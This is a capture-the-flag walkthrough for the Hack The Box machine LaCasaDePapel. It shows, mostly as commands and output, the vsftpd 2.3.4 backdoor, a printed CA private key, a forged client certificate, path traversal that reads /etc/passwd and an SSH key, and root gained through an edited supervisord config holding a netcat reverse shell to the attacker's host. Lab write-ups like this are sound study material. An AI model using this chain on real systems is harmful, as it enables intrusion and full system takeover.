LaCasaDePapel
Contents
Ports scan
u505@kali:~/HTB/Machines/LaCasaDePapel$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.131 --rate=1000 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-02-20 18:02:41 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 21/tcp on 10.10.10.131 Discovered open port 443/tcp on 10.10.10.131 Discovered open port 22/tcp on 10.10.10.131
u505@kali:~/HTB/Machines/LaCasaDePapel$ nmap -sC -sV 10.10.10.131 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 13:09 EST Nmap scan report for lacasadepapel.htb (10.10.10.131) Host is up (0.038s latency). Not shown: 914 closed ports, 82 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 7.9 (protocol 2.0) | ssh-hostkey: | 2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA) | 256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA) |_ 256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519) 80/tcp open http Node.js (Express middleware) |_http-title: La Casa De Papel 443/tcp open ssl/http Node.js Express framework | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Server returned status 401 but no WWW-Authenticate header. |_http-title: La Casa De Papel | ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel | Not valid before: 2019-01-27T08:35:30 |_Not valid after: 2029-01-24T08:35:30 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 | tls-nextprotoneg: | http/1.1 |_ http/1.0 Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 35.70 seconds
Port 80
The page ask for a google authenticator token and an email address. Once provided, the page inform that we need to follow instructions in our mailbox.
Port 443
The secure web page needs a client certificate to go ahead.
Port 21
The ftp version is vsftpd 2.3.4, well known for the backdoor.
u505@kali:~/HTB/Machines/LaCasaDePapel$ searchsploit vsftp 2.3.4
---------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------- ----------------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Me | exploits/unix/remote/17491.rb
---------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/LaCasaDePapel$ searchsploit -m 17491.rb
Exploit: vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/17491
Path: /usr/share/exploitdb/exploits/unix/remote/17491.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/LaCasaDePapel/17491.rb
The backdoor payload is interesting. In response to a :) smiley face in the FTP username, a TCP callback shell is attempted. Metasploit can send the payload too, but doesn't get a shell.
u505@kali:~/HTB/Machines/LaCasaDePapel$ nc lacasadepapel.htb 6200 Ncat: Connection refused. u505@kali:~/HTB/Machines/LaCasaDePapel$ ftp lacasadepapel.htb Connected to lacasadepapel.htb. 220 (vsFTPd 2.3.4) Name (lacasadepapel.htb:u505): u505:) 331 Please specify the password. Password: dsdfs ^C 421 Service not available, remote server has closed connection u505@kali:~/HTB/Machines/LaCasaDePapel$ nc lacasadepapel.htb 6200 Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman
Instead of a bash shell we have a Psy Shell (This is why metasploit was unable to open a shell).
Psy shell
With php functions we can see the content of the server.
scandir ("/home");
=> [
".",
"..",
"berlin",
"dali",
"nairobi",
"oslo",
"professor",
]
...
scandir ("/home/berlin");
=> [
".",
"..",
".ash_history",
".ssh",
"downloads",
"node_modules",
"server.js",
"user.txt",
]
echo readfile("/home/berlin/user.txt");
PHP Warning: readfile(/home/berlin/user.txt): failed to open stream: Permission denied in phar://eval()'d code on line 1
The user flag in in berlin home directory, but not available.
scandir("/home/dali/.ssh");
=> [
".",
"..",
"authorized_keys",
"known_hosts",
]
readfile("/home/dali/.ssh/authorized_keys");
ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAsDHKXtzjeyuWjw42RbtoDy2c6lWdtfEzsmqmHrbJDY2hDcKWekWouWhe/NTCQFim6weKtsEdTzh0Qui+6jKc8/ZtpKzHrXiSXSe48JwpG7abmp5iCihzDozJqggBNoAQrvZqBhg6svcKh8F0kTnxUkBQgBm4kjOPteN+TfFoNIod7DQ72/N25D/lVThCLcStbPkR8fgBz7TGuTTAsNFXVwjlsgwi2qUF9UM6C1JkMBk5Y9ssDHiu4R35R5eCl4EEZLL946n/Gd5QB7pmIRHMkmt2ztOaKU4xZthurZpDXt+Et+Rm3dAlAZLO/5dwjqIfmEBS1eQ4sT8hlUkuLvjUDw== thek@ThekMac.local
=> 400
Dali authorize access by ssh and private key.
scandir ("/home/nairobi");
=> [
".",
"..",
"ca.key",
"download.jade",
"error.jade",
"index.jade",
"node_modules",
"server.js",
"static",
]
readfile("/home/nairobi/ca.key");
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb
7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/
2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl
uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M
YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp
s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us
PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V
Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89
1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ
/CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+
q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr
uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd
I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og
7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE
G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn
sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH
CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y
sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI
ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2
zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/
ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC
9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M
WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM
7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR
aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc
53udBEzjt3WPqYGkkDknVhjD
-----END PRIVATE KEY-----
1704
We found a private key, and the name is ca, perhaps the certificate authority? ...
scandir ("/home/oslo/Maildir/.Sent/cur");
=> [
".",
"..",
"1582228357085.M22583P98548V0000000000068519I00000000018a624.lacasadepapel.htb,S=430,2,S",
]
readfile("/home/oslo/Maildir/.Sent/cur/1582228357085.M22583P98548V0000000000068519I00000000018a624.lacasadepapel.htb,S=430,2,S");
Content-Type: text/plain; format=flowed
From: dali@lacasadepapel.htb
To: 505559U@gmail.com
Content-Transfer-Encoding: 7bit
Date: Thu, 20 Feb 2020 19:52:37 +0000
Message-Id: <1582228357097-cf67b847-00a5d654-9b60e918@lacasadepapel.htb>
MIME-Version: 1.0
Welcome to our community!
Thanks for signing up. To continue, please verify your email address by
clicking the url below.
https://lacasadepapel.htb/8b47e8d0-541a-11ea-b783-f7248254501e
=> 453
The mail was for us. We follow the link.
We download the ca.crt (ca certificate). We can check if the certificate authority from the web page is the same than the the key of ca we found in nairobi folder.
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl x509 -noout -pubkey -in ca.crt -----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/ 5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e 8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM ZwIDAQAB -----END PUBLIC KEY----- u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl rsa -in ca.key -pubout writing RSA key -----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/ 5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e 8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM ZwIDAQAB -----END PUBLIC KEY-----
The public keys match, so we have the certificate authority of the web site.
Client certificate creation
Private key
First we generate our own private key.
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl genrsa -out u505.key 2048 Generating RSA private key, 2048 bit long modulus (2 primes) ...........................................+++++ ..........................................................................................................................................+++++ e is 65537 (0x010001)
Certificate request
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl req -new -key u505.key -out u505.csr You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:BE State or Province Name (full name) [Some-State]:BXL Locality Name (eg, city) []:BXL Organization Name (eg, company) [Internet Widgits Pty Ltd]:Luniel Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []:u505 Email Address []:505559U@gmail.com
Please enter the following 'extra' attributes to be sent with your certificate request A challenge password []: An optional company name []:
Sign our certificate with the CA
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl x509 -req -days 3650 -in u505.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out u505.crt Signature ok subject=C = BE, ST = BXL, L = BXL, O = Luniel, CN = u505, emailAddress = 505559U@gmail.com Getting CA Private Key
We check the signed certificate
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl x509 -text -noout -in u505.crt
Certificate:
Data:
Version: 1 (0x0)
Serial Number:
1f:67:d2:c3:74:04:a1:fc:ea:df:11:59:c0:3a:96:f8:ca:50:2c:86
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN = lacasadepapel.htb, O = La Casa De Papel
Validity
Not Before: Feb 21 13:31:54 2020 GMT
Not After : Feb 18 13:31:54 2030 GMT
Subject: C = BE, ST = BXL, L = BXL, O = Luniel, CN = u505, emailAddress = 505559U@gmail.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:c1:2c:83:5c:67:85:a3:da:e5:cd:f0:05:45:12:
e2:4e:99:11:cf:b4:f6:97:b8:58:93:2d:d1:72:de:
28:0e:4d:0d:80:23:4e:c2:48:c5:23:48:0a:8b:4c:
4a:c0:e1:36:af:81:ae:dc:ac:cb:e3:a2:e5:2f:00:
44:e6:59:5a:58:6c:c0:fd:ea:cc:52:0e:de:c6:5e:
37:77:eb:d6:df:9f:c8:fe:14:92:90:ad:f6:d2:03:
04:ad:6a:c2:44:e7:2c:31:1d:12:d7:a7:14:4b:16:
71:0f:bf:c6:74:9a:9e:2f:1e:b8:3f:8a:37:df:83:
8c:bc:d9:c4:12:62:96:ae:19:b1:f9:02:c7:7b:0c:
85:92:c7:a7:b2:94:2b:77:5b:ae:8c:39:a7:bc:4e:
91:bd:fb:15:7e:da:5c:95:2b:87:61:1c:e7:fe:45:
57:98:ac:fc:db:4a:b8:61:93:62:db:cf:35:5e:ea:
ad:4f:9d:52:df:0c:9d:b8:99:8c:c5:6f:ce:f8:c3:
b0:b8:6b:36:fc:c2:d4:c3:a7:7d:aa:34:e7:c0:45:
f8:7c:6f:17:7b:6c:c6:ee:69:e7:b4:03:77:de:4f:
2a:12:7d:7d:2c:f1:75:45:c1:41:f5:3c:00:41:e8:
a6:e7:a9:c4:72:ba:e0:4d:e2:4f:01:3c:72:d1:61:
08:d9
Exponent: 65537 (0x10001)
Signature Algorithm: sha256WithRSAEncryption
ab:4b:d1:d9:e4:11:ed:20:21:04:05:f9:db:84:c8:76:0a:74:
c3:04:34:5f:6a:c1:4d:0b:bd:73:86:cf:5c:cb:b6:ad:88:e7:
ae:00:2c:a6:2a:09:1e:0a:f2:f9:37:ab:68:38:54:2b:03:cf:
98:df:28:ec:cc:6b:a0:b4:85:a1:f1:cd:98:49:58:e3:91:85:
47:19:72:95:86:d1:29:36:f8:74:66:b4:ac:a8:a5:47:04:24:
e8:fa:fe:0d:88:98:5a:e3:be:23:22:3d:42:51:a0:00:b5:83:
97:5c:be:14:bc:bb:ec:1b:83:27:1a:f3:b9:2b:04:53:ac:4d:
65:1f:8e:e6:b2:a5:4e:d9:a6:5c:5b:1d:7c:ed:11:cc:7d:61:
f0:1e:8f:bb:a4:2b:1b:ea:54:81:5a:9e:f5:89:b0:9d:39:50:
ea:21:18:4f:44:f8:e5:a7:9f:e8:d3:a1:e2:f4:db:58:3b:05:
3c:65:f2:67:8f:1a:a2:83:8d:dc:a9:df:f1:e8:1e:8f:ff:73:
11:20:c6:9b:62:9c:36:18:41:14:4a:0b:36:df:e9:da:63:b8:
73:44:ad:57:bf:2d:08:9d:c3:cb:b2:1a:d2:dc:50:59:07:a7:
75:90:b1:92:ec:4e:69:20:f4:60:35:f2:9a:69:e8:24:53:ca:
d8:72:64:4e
Create PKCS#12 to import in firefox
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl pkcs12 -export -in u505.crt -inkey u505.key -out u505.pfx Enter Export Password: Verifying - Enter Export Password:
Import certificate in firefox
Open the web page with the client certificate.
Now we are able to access the "private" area of this server.
Digging into the web application
The application shows directories with the argument path, and the argument file read the file on base64 representation. For example the URL https://lacasadepapel.htb/file/U0VBU09OLTEvMDEuYXZp downloads the file:
u505@kali:~/HTB/Machines/LaCasaDePapel$ echo "U0VBU09OLTEvMDEuYXZp" | base64 -d
SEASON-1/01.avi
If we test /etc/passwd
u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/`echo -n "/etc/passwd" | base64` <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Error</title> </head> <body> <pre>Error: ENOENT: no such file or directory, open '/home/berlin/downloads//etc/passwd'<br> at Object.fs.openSync (fs.js:646:18)<br> at Object.fs.readFileSync (fs.js:551:33)<br> at /home/berlin/server.js:32:15<br> at Layer.handle [as handle_request] (/home/berlin/node_modules/express/lib/router/layer.js:95:5)<br> at next (/home/berlin/node_modules/express/lib/router/route.js:137:13) <br> at Route.dispatch (/home/berlin/node_modules/express/lib/router/route.js:112:3)<br> at Layer.handle [as handle_request] (/home/berlin/node_modules/express/lib/router/layer.js:95:5)<br> at /home/berlin/node_modules/express/lib/router/index.js:281:22<br> at param (/home/berlin/node_modules/express/lib/router/index.js:354:14)<br> at param (/home/berlin/node_modules/express/lib/router/index.js:365:14)</pre> </body> </html>
The path is relative to /home/berlin/downloads/
User Flag
The URL https://lacasadepapel.htb/?path=../ shows us the user.txt file
We can download it, and retrieve the content.
u505@kali:~/HTB/Machines/LaCasaDePapel$ echo -n "../user.txt" | base64 Li4vdXNlci50eHQ= u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/Li4vdXNlci50eHQ= <USER_FLAG>
Remote shell
Private key
In berlin .ssh folder ( https://lacasadepapel.htb/?path=../.ssh/) there is a file id_rsa
u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/`echo -n "../.ssh/id_rsa" | base64` --output id_rsaberlin % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 3389 100 3389 0 0 5629 0 --:--:-- --:--:-- --:--:-- 5620 u505@kali:~/HTB/Machines/LaCasaDePapel$ file id_rsaberlin id_rsaberlin: OpenSSH private key
We test it
u505@kali:~/HTB/Machines/LaCasaDePapel$ chmod 600 id_rsaberlin
u505@kali:~/HTB/Machines/LaCasaDePapel$ ssh -i id_rsaberlin berlin@lacasadepapel.htb
The authenticity of host 'lacasadepapel.htb (10.10.10.131)' can't be established.
ECDSA key fingerprint is SHA256:rA99W+GVzo0hlABp1vMj9ChhjLwybPhHTpb65AWm7xI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'lacasadepapel.htb,10.10.10.131' (ECDSA) to the list of known hosts.
berlin@lacasadepapel.htb's password:
Permission denied, please try again.
berlin@lacasadepapel.htb's password:
Permission denied, please try again.
berlin@lacasadepapel.htb's password:
berlin@lacasadepapel.htb: Permission denied (publickey,password,keyboard-interactive).
Enumerate users
We can list /home from the webpage
Or a better solution is to download directly the file /etc/passwd
u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/`echo -n "../../../etc/passwd" | base64` root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/usr/lib/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin operator:x:11:0:operator:/root:/bin/sh man:x:13:15:man:/usr/man:/sbin/nologin postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin cron:x:16:16:cron:/var/spool/cron:/sbin/nologin ftp:x:21:21::/var/lib/ftp:/sbin/nologin sshd:x:22:22:sshd:/dev/null:/sbin/nologin at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin games:x:35:35:games:/usr/games:/sbin/nologin postgres:x:70:70::/var/lib/postgresql:/bin/sh cyrus:x:85:12::/usr/cyrus:/sbin/nologin vpopmail:x:89:89::/var/vpopmail:/sbin/nologin ntp:x:123:123:NTP:/var/empty:/sbin/nologin smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin guest:x:405:100:guest:/dev/null:/sbin/nologin nobody:x:65534:65534:nobody:/:/sbin/nologin chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin dali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psysh berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash professor:x:1002:1002:professor,,,:/home/professor:/bin/ash vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin memcached:x:102:102:memcached:/home/memcached:/sbin/nologin
There is no 5 users as we observed in folder /home but 3:
- dali
- berlin
- professor
Nairobi and Oslo are not real users of the system. Dali is the user assigned to vsftp because the shell is psysh.
User professor
We user professor and the privatekey found in berlin's folder, we gain a full ssh shell with a beautiful banner :)
u505@kali:~/HTB/Machines/LaCasaDePapel$ ssh -i id_rsaberlin professor@lacasadepapel.htb
_ ____ ____ ____ _ | | __ _ / ___|__ _ ___ __ _ | _ \ ___ | _ \ __ _ _ __ ___| | | | / _` | | | / _` / __|/ _` | | | | |/ _ \ | |_) / _` | '_ \ / _ \ | | |__| (_| | | |__| (_| \__ \ (_| | | |_| | __/ | __/ (_| | |_) | __/ | |_____\__,_| \____\__,_|___/\__,_| |____/ \___| |_| \__,_| .__/ \___|_| |_|
lacasadepapel [~]$ whoami professor
Local enumeration
u505@kali:~/HTB/Machines/LaCasaDePapel$ mkdir www u505@kali:~/HTB/Machines/LaCasaDePapel$ cd www/ u505@kali:~/HTB/Machines/LaCasaDePapel/www$ cp /opt/utils/pspy/pspy64 ./ u505@kali:~/HTB/Machines/LaCasaDePapel/www$ cp /opt/utils/LinEnum/LinEnum.sh ./ u505@kali:~/HTB/Machines/LaCasaDePapel/www$ sudo python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
From the target machine
lacasadepapel [/tmp]$ wget http://10.10.14.6/LinEnum.sh Connecting to 10.10.14.6 (10.10.14.6:80) LinEnum.sh 100% |********************************| 46631 0:00:00 ETA lacasadepapel [/tmp]$ wget http://10.10.14.6/pspy64 Connecting to 10.10.14.6 (10.10.14.6:80) pspy64 100% |********************************| 3006k 0:00:00 ETA lacasadepapel [/tmp]$ chmod +x pspy64 LinEnum.sh
Cronjob
2020/02/22 13:44:00 CMD: UID=0 PID=6625 | /sbin/openrc-run /etc/init.d/supervisord restart 2020/02/22 13:44:00 CMD: UID=0 PID=6624 | /sbin/openrc-run /etc/init.d/supervisord restart 2020/02/22 13:44:01 CMD: UID=0 PID=6627 | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord stop 2020/02/22 13:44:01 CMD: UID=0 PID=6642 | start-stop-daemon --stop --exec /usr/bin/supervisord --pidfile /var/run/supervisord.pid 2020/02/22 13:44:01 CMD: UID=0 PID=6650 | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord start 2020/02/22 13:44:01 CMD: UID=0 PID=6649 | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord start 2020/02/22 13:44:01 CMD: UID=0 PID=6652 | 2020/02/22 13:44:01 CMD: UID=0 PID=6664 | start-stop-daemon --start --exec /usr/bin/supervisord --pidfile /var/run/supervisord.pid --background --make-pidfile -- --nodaemon --pidfile /var/run/supervisord.pid --configuration /etc/supervisord.conf 2020/02/22 13:44:01 CMD: UID=0 PID=6665 | start-stop-daemon --start --exec /usr/bin/supervisord --pidfile /var/run/supervisord.pid --background --make-pidfile -- --nodaemon --pidfile /var/run/supervisord.pid --configuration /etc/supervisord.conf 2020/02/22 13:44:01 CMD: UID=0 PID=6668 | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord start 2020/02/22 13:44:01 CMD: UID=0 PID=6672 | /usr/bin/python2 /usr/bin/supervisord --nodaemon --pidfile /var/run/supervisord.pid --configuration /etc/supervisord.conf 2020/02/22 13:44:02 CMD: UID=0 PID=6673 | sudo -u nobody /usr/bin/node /home/professor/memcached.js
We cannot access file /etc/supervisord.conf
lacasadepapel [~]$ cat /etc/supervisord.conf cat: can't open '/etc/supervisord.conf': Permission denied lacasadepapel [~]$ ls -l /etc/supervisord.conf -rw------- 1 root root 313 Jan 29 2019 /etc/supervisord.conf
We don't have access to /home/professor/memcached.js neither, but we have access to a file next to it.
lacasadepapel [~]$ ls -ltr total 12 -rw-r----- 1 root nobody 434 Jan 29 2019 memcached.js -rw-r--r-- 1 root root 88 Jan 29 2019 memcached.ini drwxr-sr-x 9 root professo 4096 Jan 29 2019 node_modules
The ini file contains the sudo command run on the cronjob.
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
Escalation of privileges
Raise of listener
u505@kali:~/HTB/Machines/LaCasaDePapel/www$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Change memcached.ini
The file is read only. But it is on professor's folder.
lacasadepapel [~]$ ls -lta
total 24
drwxr-sr-x 4 professo professo 4096 Mar 6 2019 .
drwxr-xr-x 7 root root 4096 Feb 16 2019 ..
drwx------ 2 professo professo 4096 Jan 31 2019 .ssh
drwxr-sr-x 9 root professo 4096 Jan 29 2019 node_modules
-rw-r--r-- 1 root root 88 Jan 29 2019 memcached.ini
-rw-r----- 1 root nobody 434 Jan 29 2019 memcached.js
lrwxrwxrwx 1 root professo 9 Nov 6 2018 .ash_history -> /dev/null
We are allowed to move the file.
lacasadepapel [~]$ mv memcached.ini memcached.ini.org
And we can create our own file
lacasadepapel [~]$ vi memcached.ini
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = nc 10.10.14.6 4444 -e /bin/bash
Reverse shell
Once the crontab ran, we gain the reverse shell
u505@kali:/home$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.131. Ncat: Connection from 10.10.10.131:34955. whoami root python -c "import pty;pty.spawn('/bin/bash')"
Root flag
bash-4.4# cat /root/root.txt cat /root/root.txt <ROOT_FLAG>
References
- https://pastebin.com/AetT9sS5
- Alert: vsftpd download backdoored
- A runtime developer console, interactive debugger and REPL for PHP.
Daniel Simao 13:00, 20 February 2020 (EST)
